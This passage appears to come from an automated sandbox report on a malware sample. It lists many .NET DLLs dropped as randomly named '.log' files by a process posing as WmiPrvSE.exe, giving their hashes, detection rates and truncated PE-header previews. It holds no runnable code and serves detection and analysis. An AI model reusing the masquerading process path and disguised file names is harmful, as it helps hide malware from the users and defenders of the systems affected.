Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RXHdCRrs.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\RfxtYLmQ.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RngMDvMV.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\RoOvQmlu.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\SFRmUDLH.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\STgXZIan.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\SYsmfrex.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\TMiCdAAw.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\TcjfiIuK.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\TideCjWs.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\UAlWJNil.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VBmvCWAb.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\VNPvpVFD.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VfEmYjln.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XOCTRFXH.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\XQkCfxwg.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XYaTBrrE.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XgJlfaRK.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XprDnjwZ.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XujdOCGR.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\YiicOEwG.log

